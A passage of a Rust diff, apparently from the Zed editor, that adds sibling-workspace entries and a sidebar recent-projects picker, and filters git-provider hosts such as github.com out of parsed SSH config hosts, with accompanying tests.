fn can_select(&self, ix: usize, _window: &mut Window, _cx: &mut Context<Picker<Self>>) -> bool {
matches!(
self.filtered_entries.get(ix),
- Some(ProjectPickerEntry::OpenFolder { .. } | ProjectPickerEntry::RecentProject(_))
+ Some(
+ ProjectPickerEntry::OpenFolder { .. }
+ | ProjectPickerEntry::OpenProject(_)
+ | ProjectPickerEntry::RecentProject(_)
+ )
)
}
@@ -788,6 +857,38 @@ impl PickerDelegate for RecentProjectsDelegate {
))
};
+ let sibling_candidates: Vec<_> = self
+ .workspaces
+ .iter()
+ .enumerate()
+ .filter(|(_, (id, _, _, _))| self.is_sibling_workspace(*id, cx))
+ .map(|(id, (_, _, paths, _))| {
+ let combined_string = paths
+ .ordered_paths()
+ .map(|path| path.compact().to_string_lossy().into_owned())
+ .collect::<Vec<_>>()
+ .join("");
+ StringMatchCandidate::new(id, &combined_string)
+ })
+ .collect();
+
+ let mut sibling_matches = smol::block_on(fuzzy::match_strings(
+ &sibling_candidates,
+ query,
+ smart_case,
+ true,
+ 100,
+ &Default::default(),
+ cx.background_executor().clone(),
+ ));
+ sibling_matches.sort_unstable_by(|a, b| {
+ b.score
+ .partial_cmp(&a.score)
+ .unwrap_or(std::cmp::Ordering::Equal)
+ .then_with(|| a.candidate_id.cmp(&b.candidate_id))
+ });
+
+ // Build candidates for recent projects (not current, not sibling, not open folder)
let recent_candidates: Vec<_> = self
.workspaces
.iter()
@@ -838,6 +939,33 @@ impl PickerDelegate for RecentProjectsDelegate {
}
}
+ let has_siblings_to_show = if is_empty_query {
+ !sibling_candidates.is_empty()
+ } else {
+ !sibling_matches.is_empty()
+ };
+
+ if has_siblings_to_show {
+ entries.push(ProjectPickerEntry::Header("This Window".into()));
+
+ if is_empty_query {
+ for (id, (workspace_id, _, _, _)) in self.workspaces.iter().enumerate() {
+ if self.is_sibling_workspace(*workspace_id, cx) {
+ entries.push(ProjectPickerEntry::OpenProject(StringMatch {
+ candidate_id: id,
+ score: 0.0,
+ positions: Vec::new(),
+ string: String::new(),
+ }));
+ }
+ }
+ } else {
+ for m in sibling_matches {
+ entries.push(ProjectPickerEntry::OpenProject(m));
+ }
+ }
+ }
+
let has_recent_to_show = if is_empty_query {
!recent_candidates.is_empty()
} else {
@@ -892,6 +1020,32 @@ impl PickerDelegate for RecentProjectsDelegate {
}
cx.emit(DismissEvent);
}
+ Some(ProjectPickerEntry::OpenProject(selected_match)) => {
+ let Some((workspace_id, _, _, _)) =
+ self.workspaces.get(selected_match.candidate_id)
+ else {
+ return;
+ };
+ let workspace_id = *workspace_id;
+
+ if let Some(handle) = window.window_handle().downcast::<MultiWorkspace>() {
+ cx.defer(move |cx| {
+ handle
+ .update(cx, |multi_workspace, _window, cx| {
+ let workspace = multi_workspace
+ .workspaces()
+ .iter()
+ .find(|ws| ws.read(cx).database_id() == Some(workspace_id))
+ .cloned();
+ if let Some(workspace) = workspace {
+ multi_workspace.activate(workspace, cx);
+ }
+ })
+ .log_err();
+ });
+ }
+ cx.emit(DismissEvent);
+ }
Some(ProjectPickerEntry::RecentProject(selected_match)) => {
let Some(workspace) = self.workspace.upgrade() else {
return;
@@ -935,7 +1089,14 @@ impl PickerDelegate for RecentProjectsDelegate {
}
return;
} else {
- workspace.open_workspace_for_paths(false, paths, window, cx)
+ workspace
+ .open_workspace_for_paths(false, paths, window, cx)
+ .detach_and_prompt_err(
+ "Failed to open project",
+ window,
+ cx,
+ |_, _, _| None,
+ );
}
}
SerializedWorkspaceLocation::Remote(mut connection) => {
@@ -964,14 +1125,14 @@ impl PickerDelegate for RecentProjectsDelegate {
)
.await
})
+ .detach_and_prompt_err(
+ "Failed to open project",
+ window,
+ cx,
+ |_, _, _| None,
+ );
}
}
- .detach_and_prompt_err(
- "Failed to open project",
- window,
- cx,
- |_, _, _| None,
- );
});
cx.emit(DismissEvent);
}
@@ -1103,17 +1264,125 @@ impl PickerDelegate for RecentProjectsDelegate {
.into_any_element(),
)
}
+ ProjectPickerEntry::OpenProject(hit) => {
+ let (workspace_id, location, paths, _) = self.workspaces.get(hit.candidate_id)?;
+ let workspace_id = *workspace_id;
+ let ordered_paths: Vec<_> = paths
+ .ordered_paths()
+ .map(|p| p.compact().to_string_lossy().to_string())
+ .collect();
+ let tooltip_path: SharedString = match &location {
+ SerializedWorkspaceLocation::Remote(options) => {
+ let host = options.display_name();
+ if ordered_paths.len() == 1 {
+ format!("{} ({})", ordered_paths[0], host).into()
+ } else {
+ format!("{}\n({})", ordered_paths.join("\n"), host).into()
+ }
+ }
+ _ => ordered_paths.join("\n").into(),
+ };
+
+ let mut path_start_offset = 0;
+ let (match_labels, paths): (Vec<_>, Vec<_>) = paths
+ .ordered_paths()
+ .map(|p| p.compact())
+ .map(|path| {
+ let highlighted_text =
+ highlights_for_path(path.as_ref(), &hit.positions, path_start_offset);
+ path_start_offset += highlighted_text.1.text.len();
+ highlighted_text
+ })
+ .unzip();
+
+ let prefix = match &location {
+ SerializedWorkspaceLocation::Remote(options) => {
+ Some(SharedString::from(options.display_name()))
+ }
+ _ => None,
+ };
+
+ let highlighted_match = HighlightedMatchWithPaths {
+ prefix,
+ match_label: HighlightedMatch::join(match_labels.into_iter().flatten(), ", "),
+ paths,
+ };
+
+ let icon = icon_for_remote_connection(match location {
+ SerializedWorkspaceLocation::Local => None,
+ SerializedWorkspaceLocation::Remote(options) => Some(options),
+ });
+
+ let secondary_actions = h_flex()
+ .gap_1()
+ .child(
+ IconButton::new("remove_open_project", IconName::Close)
+ .icon_size(IconSize::Small)
+ .tooltip(Tooltip::text("Remove Project from Window"))
+ .on_click(cx.listener(move |picker, _, window, cx| {
+ cx.stop_propagation();
+ window.prevent_default();
+ picker
+ .delegate
+ .remove_sibling_workspace(workspace_id, window, cx);
+ let query = picker.query(cx);
+ picker.update_matches(query, window, cx);
+ })),
+ )
+ .into_any_element();
+
+ Some(
+ ListItem::new(ix)
+ .toggle_state(selected)
+ .inset(true)
+ .spacing(ListItemSpacing::Sparse)
+ .child(
+ h_flex()
+ .id("open_project_info_container")
+ .gap_3()
+ .flex_grow()
+ .when(self.has_any_non_local_projects, |this| {
+ this.child(Icon::new(icon).color(Color::Muted))
+ })
+ .child({
+ let mut highlighted = highlighted_match;
+ if !self.render_paths {
+ highlighted.paths.clear();
+ }
+ highlighted.render(window, cx)
+ })
+ .tooltip(Tooltip::text(tooltip_path)),
+ )
+ .map(|el| {
+ if self.selected_index == ix {
+ el.end_slot(secondary_actions)
+ } else {
+ el.end_hover_slot(secondary_actions)
+ }
+ })
+ .into_any_element(),
+ )
+ }
ProjectPickerEntry::RecentProject(hit) => {
let popover_style = matches!(self.style, ProjectPickerStyle::Popover);
let (_, location, paths, _) = self.workspaces.get(hit.candidate_id)?;
let is_local = matches!(location, SerializedWorkspaceLocation::Local);
let paths_to_add = paths.paths().to_vec();
- let tooltip_path: SharedString = paths
+ let ordered_paths: Vec<_> = paths
.ordered_paths()
.map(|p| p.compact().to_string_lossy().to_string())
- .collect::<Vec<_>>()
- .join("\n")
- .into();
+ .collect();
+ let tooltip_path: SharedString = match &location {
+ SerializedWorkspaceLocation::Remote(options) => {
+ let host = options.display_name();
+ if ordered_paths.len() == 1 {
+ format!("{} ({})", ordered_paths[0], host).into()
+ } else {
+ format!("{}\n({})", ordered_paths.join("\n"), host).into()
+ }
+ }
+ _ => ordered_paths.join("\n").into(),
+ };
let mut path_start_offset = 0;
let (match_labels, paths): (Vec<_>, Vec<_>) = paths
@@ -1146,9 +1415,9 @@ impl PickerDelegate for RecentProjectsDelegate {
.gap_px()
.when(is_local, |this| {
this.child(
- IconButton::new("add_to_workspace", IconName::Plus)
+ IconButton::new("add_to_workspace", IconName::FolderPlus)
.icon_size(IconSize::Small)
- .tooltip(Tooltip::text("Add Project to Workspace"))
+ .tooltip(Tooltip::text("Add Project to this Workspace"))
.on_click({
let paths_to_add = paths_to_add.clone();
cx.listener(move |picker, _event, window, cx| {
@@ -1240,9 +1509,9 @@ impl PickerDelegate for RecentProjectsDelegate {
fn render_footer(&self, _: &mut Window, cx: &mut Context<Picker<Self>>) -> Option<AnyElement> {
let focus_handle = self.focus_handle.clone();
let popover_style = matches!(self.style, ProjectPickerStyle::Popover);
- let open_folder_section = matches!(
- self.filtered_entries.get(self.selected_index)?,
- ProjectPickerEntry::OpenFolder { .. }
+ let is_already_open_entry = matches!(
+ self.filtered_entries.get(self.selected_index),
+ Some(ProjectPickerEntry::OpenFolder { .. } | ProjectPickerEntry::OpenProject(_))
);
if popover_style {
@@ -1296,7 +1565,7 @@ impl PickerDelegate for RecentProjectsDelegate {
.border_t_1()
.border_color(cx.theme().colors().border_variant)
.map(|this| {
- if open_folder_section {
+ if is_already_open_entry {
this.child(
Button::new("activate", "Activate")
.key_binding(KeyBinding::for_action_in(
@@ -1382,7 +1651,7 @@ impl PickerDelegate for RecentProjectsDelegate {
}
}
-fn icon_for_remote_connection(options: Option<&RemoteConnectionOptions>) -> IconName {
+pub(crate) fn icon_for_remote_connection(options: Option<&RemoteConnectionOptions>) -> IconName {
match options {
None => IconName::Screen,
Some(options) => match options {
@@ -1396,7 +1665,7 @@ fn icon_for_remote_connection(options: Option<&RemoteConnectionOptions>) -> Icon
}
// Compute the highlighted text for the name and path
-fn highlights_for_path(
+pub(crate) fn highlights_for_path(
path: &Path,
match_positions: &Vec<usize>,
path_start_offset: usize,
@@ -1495,16 +1764,16 @@ impl RecentProjectsDelegate {
.workspace
.upgrade()
.map(|ws| ws.read(cx).app_state().fs.clone());
+ let db = WorkspaceDb::global(cx);
cx.spawn_in(window, async move |this, cx| {
- WORKSPACE_DB
- .delete_workspace_by_id(workspace_id)
- .await
- .log_err();
+ db.delete_workspace_by_id(workspace_id).await.log_err();
let Some(fs) = fs else { return };
- let workspaces = WORKSPACE_DB
+ let workspaces = db
.recent_workspaces_on_disk(fs.as_ref())
.await
.unwrap_or_default();
+ let workspaces =
+ workspace::resolve_worktree_workspaces(workspaces, fs.as_ref()).await;
this.update_in(cx, move |picker, window, cx| {
picker.delegate.set_workspaces(workspaces);
picker
@@ -1525,6 +1794,31 @@ impl RecentProjectsDelegate {
}
}
+ fn remove_sibling_workspace(
+ &mut self,
+ workspace_id: WorkspaceId,
+ window: &mut Window,
+ cx: &mut Context<Picker<Self>>,
+ ) {
+ if let Some(handle) = window.window_handle().downcast::<MultiWorkspace>() {
+ cx.defer(move |cx| {
+ handle
+ .update(cx, |multi_workspace, window, cx| {
+ let index = multi_workspace
+ .workspaces()
+ .iter()
+ .position(|ws| ws.read(cx).database_id() == Some(workspace_id));
+ if let Some(index) = index {
+ multi_workspace.remove_workspace(index, window, cx);
+ }
+ })
+ .log_err();
+ });
+ }
+
+ self.sibling_workspace_ids.remove(&workspace_id);
+ }
+
fn is_current_workspace(
&self,
workspace_id: WorkspaceId,
@@ -1540,6 +1834,15 @@ impl RecentProjectsDelegate {
false
}
+ fn is_sibling_workspace(
+ &self,
+ workspace_id: WorkspaceId,
+ cx: &mut Context<Picker<Self>>,
+ ) -> bool {
+ self.sibling_workspace_ids.contains(&workspace_id)
+ && !self.is_current_workspace(workspace_id, cx)
+ }
+
fn is_open_folder(&self, paths: &PathList) -> bool {
if self.open_folders.is_empty() {
return false;
@@ -1562,7 +1865,9 @@ impl RecentProjectsDelegate {
paths: &PathList,
cx: &mut Context<Picker<Self>>,
) -> bool {
- !self.is_current_workspace(workspace_id, cx) && !self.is_open_folder(paths)
+ !self.is_current_workspace(workspace_id, cx)
+ && !self.is_sibling_workspace(workspace_id, cx)
+ && !self.is_open_folder(paths)
}
}
@@ -10,7 +10,6 @@ use extension_host::ExtensionStore;
use futures::{FutureExt as _, channel::oneshot, select};
use gpui::{AppContext, AsyncApp, PromptLevel, WindowHandle};
-use language::Point;
use project::trusted_worktrees;
use remote::{
DockerConnectionOptions, Interactive, RemoteConnection, RemoteConnectionOptions,
@@ -458,7 +457,12 @@ pub fn navigate_to_positions(
active_editor.update(cx, |editor, cx| {
let row = row.saturating_sub(1);
let col = path.column.unwrap_or(0).saturating_sub(1);
- editor.go_to_singleton_buffer_point(Point::new(row, col), window, cx);
+ let Some(buffer) = editor.buffer().read(cx).as_singleton() else {
+ return;
+ };
+ let buffer_snapshot = buffer.read(cx).snapshot();
+ let point = buffer_snapshot.point_from_external_input(row, col);
+ editor.go_to_singleton_buffer_point(point, window, cx);
});
})
.ok();
@@ -17,7 +17,6 @@ use gpui::{
EventEmitter, FocusHandle, Focusable, PromptLevel, ScrollHandle, Subscription, Task,
WeakEntity, Window, canvas,
};
-use language::Point;
use log::{debug, info};
use open_path_prompt::OpenPathDelegate;
use paths::{global_ssh_config_file, user_ssh_config_file};
@@ -390,7 +389,7 @@ impl ProjectPicker {
) -> Entity<Self> {
let (tx, rx) = oneshot::channel();
let lister = project::DirectoryLister::Project(project.clone());
- let delegate = open_path_prompt::OpenPathDelegate::new(tx, lister, false, cx);
+ let delegate = open_path_prompt::OpenPathDelegate::new(tx, lister, false, cx).show_hidden();
let picker = cx.new(|cx| {
let picker = Picker::uniform_list(delegate, window, cx)
@@ -519,11 +518,15 @@ impl ProjectPicker {
active_editor.update(cx, |editor, cx| {
let row = row.saturating_sub(1);
let col = path.column.unwrap_or(0).saturating_sub(1);
- editor.go_to_singleton_buffer_point(
- Point::new(row, col),
- window,
- cx,
- );
+ let Some(buffer) =
+ editor.buffer().read(cx).as_singleton()
+ else {
+ return;
+ };
+ let buffer_snapshot = buffer.read(cx).snapshot();
+ let point =
+ buffer_snapshot.point_from_external_input(row, col);
+ editor.go_to_singleton_buffer_point(point, window, cx);
});
})
.ok();
@@ -2117,8 +2120,10 @@ impl RemoteServerProjects {
.child(
Button::new("learn-more", "Learn More")
.label_size(LabelSize::Small)
- .icon(IconName::ArrowUpRight)
- .icon_size(IconSize::XSmall)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::XSmall),
+ )
.on_click(|_, _, cx| {
cx.open_url(
"https://zed.dev/docs/remote-development",
@@ -0,0 +1,424 @@
+use std::collections::HashSet;
+use std::sync::Arc;
+
+use chrono::{DateTime, Utc};
+use fuzzy::{StringMatch, StringMatchCandidate};
+use gpui::{
+ Action, AnyElement, App, Context, DismissEvent, Entity, EventEmitter, FocusHandle, Focusable,
+ Subscription, Task, WeakEntity, Window,
+};
+use picker::{
+ Picker, PickerDelegate,
+ highlighted_match_with_paths::{HighlightedMatch, HighlightedMatchWithPaths},
+};
+use remote::RemoteConnectionOptions;
+use settings::Settings;
+use ui::{KeyBinding, ListItem, ListItemSpacing, Tooltip, prelude::*};
+use ui_input::ErasedEditor;
+use util::{ResultExt, paths::PathExt};
+use workspace::{
+ MultiWorkspace, OpenOptions, PathList, SerializedWorkspaceLocation, Workspace, WorkspaceDb,
+ WorkspaceId, notifications::DetachAndPromptErr,
+};
+
+use crate::{highlights_for_path, icon_for_remote_connection, open_remote_project};
+
+pub struct SidebarRecentProjects {
+ pub picker: Entity<Picker<SidebarRecentProjectsDelegate>>,
+ _subscription: Subscription,
+}
+
+impl SidebarRecentProjects {
+ pub fn popover(
+ workspace: WeakEntity<Workspace>,
+ sibling_workspace_ids: HashSet<WorkspaceId>,
+ _focus_handle: FocusHandle,
+ window: &mut Window,
+ cx: &mut App,
+ ) -> Entity<Self> {
+ let fs = workspace
+ .upgrade()
+ .map(|ws| ws.read(cx).app_state().fs.clone());
+
+ cx.new(|cx| {
+ let delegate = SidebarRecentProjectsDelegate {
+ workspace,
+ sibling_workspace_ids,
+ workspaces: Vec::new(),
+ filtered_workspaces: Vec::new(),
+ selected_index: 0,
+ has_any_non_local_projects: false,
+ focus_handle: cx.focus_handle(),
+ };
+
+ let picker: Entity<Picker<SidebarRecentProjectsDelegate>> = cx.new(|cx| {
+ Picker::list(delegate, window, cx)
+ .list_measure_all()
+ .show_scrollbar(true)
+ });
+
+ let picker_focus_handle = picker.focus_handle(cx);
+ picker.update(cx, |picker, _| {
+ picker.delegate.focus_handle = picker_focus_handle;
+ });
+
+ let _subscription =
+ cx.subscribe(&picker, |_this: &mut Self, _, _, cx| cx.emit(DismissEvent));
+
+ let db = WorkspaceDb::global(cx);
+ cx.spawn_in(window, async move |this, cx| {
+ let Some(fs) = fs else { return };
+ let workspaces = db
+ .recent_workspaces_on_disk(fs.as_ref())
+ .await
+ .log_err()
+ .unwrap_or_default();
+ let workspaces =
+ workspace::resolve_worktree_workspaces(workspaces, fs.as_ref()).await;
+ this.update_in(cx, move |this, window, cx| {
+ this.picker.update(cx, move |picker, cx| {
+ picker.delegate.set_workspaces(workspaces);
+ picker.update_matches(picker.query(cx), window, cx)
+ })
+ })
+ .ok();
+ })
+ .detach();
+
+ picker.focus_handle(cx).focus(window, cx);
+
+ Self {
+ picker,
+ _subscription,
+ }
+ })
+ }
+}
+
+impl EventEmitter<DismissEvent> for SidebarRecentProjects {}
+
+impl Focusable for SidebarRecentProjects {
+ fn focus_handle(&self, cx: &App) -> FocusHandle {
+ self.picker.focus_handle(cx)
+ }
+}
+
+impl Render for SidebarRecentProjects {
+ fn render(&mut self, _: &mut Window, _cx: &mut Context<Self>) -> impl IntoElement {
+ v_flex()
+ .key_context("SidebarRecentProjects")
+ .w(rems(18.))
+ .child(self.picker.clone())
+ }
+}
+
+pub struct SidebarRecentProjectsDelegate {
+ workspace: WeakEntity<Workspace>,
+ sibling_workspace_ids: HashSet<WorkspaceId>,
+ workspaces: Vec<(
+ WorkspaceId,
+ SerializedWorkspaceLocation,
+ PathList,
+ DateTime<Utc>,
+ )>,
+ filtered_workspaces: Vec<StringMatch>,
+ selected_index: usize,
+ has_any_non_local_projects: bool,
+ focus_handle: FocusHandle,
+}
+
+impl SidebarRecentProjectsDelegate {
+ pub fn set_workspaces(
+ &mut self,
+ workspaces: Vec<(
+ WorkspaceId,
+ SerializedWorkspaceLocation,
+ PathList,
+ DateTime<Utc>,
+ )>,
+ ) {
+ self.has_any_non_local_projects = workspaces
+ .iter()
+ .any(|(_, location, _, _)| !matches!(location, SerializedWorkspaceLocation::Local));
+ self.workspaces = workspaces;
+ }
+}
+
+impl EventEmitter<DismissEvent> for SidebarRecentProjectsDelegate {}
+
+impl PickerDelegate for SidebarRecentProjectsDelegate {
+ type ListItem = AnyElement;
+
+ fn placeholder_text(&self, _window: &mut Window, _cx: &mut App) -> Arc<str> {
+ "Search recent projects…".into()
+ }
+
+ fn render_editor(
+ &self,
+ editor: &Arc<dyn ErasedEditor>,
+ window: &mut Window,
+ cx: &mut Context<Picker<Self>>,
+ ) -> Div {
+ h_flex()
+ .flex_none()
+ .h_9()
+ .px_2p5()
+ .justify_between()
+ .border_b_1()
+ .border_color(cx.theme().colors().border_variant)
+ .child(editor.render(window, cx))
+ }
+
+ fn match_count(&self) -> usize {
+ self.filtered_workspaces.len()
+ }
+
+ fn selected_index(&self) -> usize {
+ self.selected_index
+ }
+
+ fn set_selected_index(
+ &mut self,
+ ix: usize,
+ _window: &mut Window,
+ _cx: &mut Context<Picker<Self>>,
+ ) {
+ self.selected_index = ix;
+ }
+
+ fn update_matches(
+ &mut self,
+ query: String,
+ _: &mut Window,
+ cx: &mut Context<Picker<Self>>,
+ ) -> Task<()> {
+ let query = query.trim_start();
+ let smart_case = query.chars().any(|c| c.is_uppercase());
+ let is_empty_query = query.is_empty();
+
+ let current_workspace_id = self
+ .workspace
+ .upgrade()
+ .and_then(|ws| ws.read(cx).database_id());
+
+ let candidates: Vec<_> = self
+ .workspaces
+ .iter()
+ .enumerate()
+ .filter(|(_, (id, _, _, _))| {
+ Some(*id) != current_workspace_id && !self.sibling_workspace_ids.contains(id)
+ })
+ .map(|(id, (_, _, paths, _))| {
+ let combined_string = paths
+ .ordered_paths()
+ .map(|path| path.compact().to_string_lossy().into_owned())
+ .collect::<Vec<_>>()
+ .join("");
+ StringMatchCandidate::new(id, &combined_string)
+ })
+ .collect();
+
+ if is_empty_query {
+ self.filtered_workspaces = candidates
+ .into_iter()
+ .map(|candidate| StringMatch {
+ candidate_id: candidate.id,
+ score: 0.0,
+ positions: Vec::new(),
+ string: candidate.string,
+ })
+ .collect();
+ } else {
+ let mut matches = smol::block_on(fuzzy::match_strings(
+ &candidates,
+ query,
+ smart_case,
+ true,
+ 100,
+ &Default::default(),
+ cx.background_executor().clone(),
+ ));
+ matches.sort_unstable_by(|a, b| {
+ b.score
+ .partial_cmp(&a.score)
+ .unwrap_or(std::cmp::Ordering::Equal)
+ .then_with(|| a.candidate_id.cmp(&b.candidate_id))
+ });
+ self.filtered_workspaces = matches;
+ }
+
+ self.selected_index = 0;
+ Task::ready(())
+ }
+
+ fn confirm(&mut self, _secondary: bool, window: &mut Window, cx: &mut Context<Picker<Self>>) {
+ let Some(hit) = self.filtered_workspaces.get(self.selected_index) else {
+ return;
+ };
+ let Some((_, location, candidate_workspace_paths, _)) =
+ self.workspaces.get(hit.candidate_id)
+ else {
+ return;
+ };
+
+ let Some(workspace) = self.workspace.upgrade() else {
+ return;
+ };
+
+ match location {
+ SerializedWorkspaceLocation::Local => {
+ if let Some(handle) = window.window_handle().downcast::<MultiWorkspace>() {
+ let paths = candidate_workspace_paths.paths().to_vec();
+ cx.defer(move |cx| {
+ if let Some(task) = handle
+ .update(cx, |multi_workspace, window, cx| {
+ multi_workspace.open_project(paths, window, cx)
+ })
+ .log_err()
+ {
+ task.detach_and_log_err(cx);
+ }
+ });
+ }
+ }
+ SerializedWorkspaceLocation::Remote(connection) => {
+ let mut connection = connection.clone();
+ workspace.update(cx, |workspace, cx| {
+ let app_state = workspace.app_state().clone();
+ let replace_window = window.window_handle().downcast::<MultiWorkspace>();
+ let open_options = OpenOptions {
+ replace_window,
+ ..Default::default()
+ };
+ if let RemoteConnectionOptions::Ssh(connection) = &mut connection {
+ crate::RemoteSettings::get_global(cx)
+ .fill_connection_options_from_settings(connection);
+ };
+ let paths = candidate_workspace_paths.paths().to_vec();
+ cx.spawn_in(window, async move |_, cx| {
+ open_remote_project(connection.clone(), paths, app_state, open_options, cx)
+ .await
+ })
+ .detach_and_prompt_err(
+ "Failed to open project",
+ window,
+ cx,
+ |_, _, _| None,
+ );
+ });
+ }
+ }
+ cx.emit(DismissEvent);
+ }
+
+ fn dismissed(&mut self, _window: &mut Window, _cx: &mut Context<Picker<Self>>) {}
+
+ fn no_matches_text(&self, _window: &mut Window, _cx: &mut App) -> Option<SharedString> {
+ let text = if self.workspaces.is_empty() {
+ "Recently opened projects will show up here"
+ } else {
+ "No matches"
+ };
+ Some(text.into())
+ }
+
+ fn render_match(
+ &self,
+ ix: usize,
+ selected: bool,
+ window: &mut Window,
+ cx: &mut Context<Picker<Self>>,
+ ) -> Option<Self::ListItem> {
+ let hit = self.filtered_workspaces.get(ix)?;
+ let (_, location, paths, _) = self.workspaces.get(hit.candidate_id)?;
+
+ let ordered_paths: Vec<_> = paths
+ .ordered_paths()
+ .map(|p| p.compact().to_string_lossy().to_string())
+ .collect();
+
+ let tooltip_path: SharedString = match &location {
+ SerializedWorkspaceLocation::Remote(options) => {
+ let host = options.display_name();
+ if ordered_paths.len() == 1 {
+ format!("{} ({})", ordered_paths[0], host).into()
+ } else {
+ format!("{}\n({})", ordered_paths.join("\n"), host).into()
+ }
+ }
+ _ => ordered_paths.join("\n").into(),
+ };
+
+ let mut path_start_offset = 0;
+ let match_labels: Vec<_> = paths
+ .ordered_paths()
+ .map(|p| p.compact())
+ .map(|path| {
+ let (label, path_match) =
+ highlights_for_path(path.as_ref(), &hit.positions, path_start_offset);
+ path_start_offset += path_match.text.len();
+ label
+ })
+ .collect();
+
+ let prefix = match &location {
+ SerializedWorkspaceLocation::Remote(options) => {
+ Some(SharedString::from(options.display_name()))
+ }
+ _ => None,
+ };
+
+ let highlighted_match = HighlightedMatchWithPaths {
+ prefix,
+ match_label: HighlightedMatch::join(match_labels.into_iter().flatten(), ", "),
+ paths: Vec::new(),
+ };
+
+ let icon = icon_for_remote_connection(match location {
+ SerializedWorkspaceLocation::Local => None,
+ SerializedWorkspaceLocation::Remote(options) => Some(options),
+ });
+
+ Some(
+ ListItem::new(ix)
+ .toggle_state(selected)
+ .inset(true)
+ .spacing(ListItemSpacing::Sparse)
+ .child(
+ h_flex()
+ .gap_3()
+ .flex_grow()
+ .when(self.has_any_non_local_projects, |this| {
+ this.child(Icon::new(icon).color(Color::Muted))
+ })
+ .child(highlighted_match.render(window, cx)),
+ )
+ .tooltip(Tooltip::text(tooltip_path))
+ .into_any_element(),
+ )
+ }
+
+ fn render_footer(&self, _: &mut Window, cx: &mut Context<Picker<Self>>) -> Option<AnyElement> {
+ let focus_handle = self.focus_handle.clone();
+
+ Some(
+ v_flex()
+ .flex_1()
+ .p_1p5()
+ .gap_1()
+ .border_t_1()
+ .border_color(cx.theme().colors().border_variant)
+ .child({
+ let open_action = workspace::Open {
+ create_new_window: false,
+ };
+ Button::new("open_local_folder", "Add Local Project")
+ .key_binding(KeyBinding::for_action_in(&open_action, &focus_handle, cx))
+ .on_click(move |_, window, cx| {
+ window.dispatch_action(open_action.boxed_clone(), cx)
+ })
+ })
+ .into_any(),
+ )
+ }
+}
@@ -1,60 +1,116 @@
use std::collections::BTreeSet;
+const FILTERED_GIT_PROVIDER_HOSTNAMES: &[&str] = &[
+ "dev.azure.com",
+ "bitbucket.org",
+ "chromium.googlesource.com",
+ "codeberg.org",
+ "gitea.com",
+ "gitee.com",
+ "github.com",
+ "gist.github.com",
+ "gitlab.com",
+ "sourcehut.org",
+ "git.sr.ht",
+];
+
pub fn parse_ssh_config_hosts(config: &str) -> BTreeSet<String> {
- let mut hosts = BTreeSet::new();
- let mut needs_another_line = false;
+ parse_host_blocks(config)
+ .into_iter()
+ .flat_map(HostBlock::non_git_provider_hosts)
+ .collect()
+}
+
+struct HostBlock {
+ aliases: BTreeSet<String>,
+ hostname: Option<String>,
+}
+
+impl HostBlock {
+ fn non_git_provider_hosts(self) -> impl Iterator<Item = String> {
+ let hostname = self.hostname;
+ let hostname_ref = hostname.as_deref().map(is_git_provider_domain);
+ self.aliases
+ .into_iter()
+ .filter(move |alias| !hostname_ref.unwrap_or_else(|| is_git_provider_domain(alias)))
+ }
+}
+
+fn parse_host_blocks(config: &str) -> Vec<HostBlock> {
+ let mut blocks = Vec::new();
+ let mut aliases = BTreeSet::new();
+ let mut hostname = None;
+ let mut needs_continuation = false;
+
for line in config.lines() {
let line = line.trim_start();
- if let Some(line) = line.strip_prefix("Host") {
- match line.chars().next() {
- Some('\\') => {
- needs_another_line = true;
- }
- Some('\n' | '\r') => {
- needs_another_line = false;
- }
- Some(c) if c.is_whitespace() => {
- parse_hosts_from(line, &mut hosts);
- }
- Some(_) | None => {
- needs_another_line = false;
- }
- };
-
- if needs_another_line {
- parse_hosts_from(line, &mut hosts);
- needs_another_line = line.trim_end().ends_with('\\');
- } else {
- needs_another_line = false;
+
+ if needs_continuation {
+ needs_continuation = line.trim_end().ends_with('\\');
+ parse_hosts(line, &mut aliases);
+ continue;
+ }
+
+ let Some((keyword, value)) = split_keyword_and_value(line) else {
+ continue;
+ };
+
+ if keyword.eq_ignore_ascii_case("host") {
+ if !aliases.is_empty() {
+ blocks.push(HostBlock { aliases, hostname });
+ aliases = BTreeSet::new();
+ hostname = None;
}
- } else if needs_another_line {
- needs_another_line = line.trim_end().ends_with('\\');
- parse_hosts_from(line, &mut hosts);
- } else {
- needs_another_line = false;
+ parse_hosts(value, &mut aliases);
+ needs_continuation = line.trim_end().ends_with('\\');
+ } else if keyword.eq_ignore_ascii_case("hostname") {
+ hostname = value.split_whitespace().next().map(ToOwned::to_owned);
}
}
- hosts
+ if !aliases.is_empty() {
+ blocks.push(HostBlock { aliases, hostname });
+ }
+
+ blocks
}
-fn parse_hosts_from(line: &str, hosts: &mut BTreeSet<String>) {
+fn parse_hosts(line: &str, hosts: &mut BTreeSet<String>) {
hosts.extend(
line.split_whitespace()
+ .map(|field| field.trim_end_matches('\\'))
.filter(|field| !field.starts_with("!"))
.filter(|field| !field.contains("*"))
+ .filter(|field| *field != "\\")
.filter(|field| !field.is_empty())
.map(|field| field.to_owned()),
);
}
+fn split_keyword_and_value(line: &str) -> Option<(&str, &str)> {
+ let keyword_end = line.find(char::is_whitespace).unwrap_or(line.len());
+ let keyword = &line[..keyword_end];
+ if keyword.is_empty() {
+ return None;
+ }
+
+ let value = line[keyword_end..].trim_start();
+ Some((keyword, value))
+}
+
+fn is_git_provider_domain(host: &str) -> bool {
+ let host = host.to_ascii_lowercase();
+ FILTERED_GIT_PROVIDER_HOSTNAMES.contains(&host.as_str())
+}
+
#[cfg(test)]
mod tests {
use super::*;
+ use indoc::indoc;
#[test]
fn test_thank_you_bjorn3() {
- let hosts = "
+ let hosts = indoc! {"
Host *
AddKeysToAgent yes
UseKeychain yes
@@ -67,19 +123,20 @@ mod tests {
User not_me
Host something
- HostName whatever.tld
+ HostName whatever.tld
- Host linux bsd host3
- User bjorn
+ Host linux bsd host3
+ User bjorn
- Host rpi
- user rpi
- hostname rpi.local
+ Host rpi
+ user rpi
+ hostname rpi.local
- Host \
- somehost \
- anotherhost
- Hostname 192.168.3.3";
+ Host \\
+ somehost \\
+ anotherhost
+ Hostname 192.168.3.3
+ "};
let expected_hosts = BTreeSet::from_iter([
"something".to_owned(),
@@ -93,4 +150,68 @@ mod tests {
assert_eq!(expected_hosts, parse_ssh_config_hosts(hosts));
}
+
+ #[test]
+ fn filters_git_provider_domains_from_hostname() {
+ let hosts = indoc! {"
+ Host github-personal
+ HostName github.com
+
+ Host gitlab-work
+ HostName GITLAB.COM
+
+ Host local
+ HostName example.com
+ "};
+
+ assert_eq!(
+ BTreeSet::from_iter(["local".to_owned()]),
+ parse_ssh_config_hosts(hosts)
+ );
+ }
+
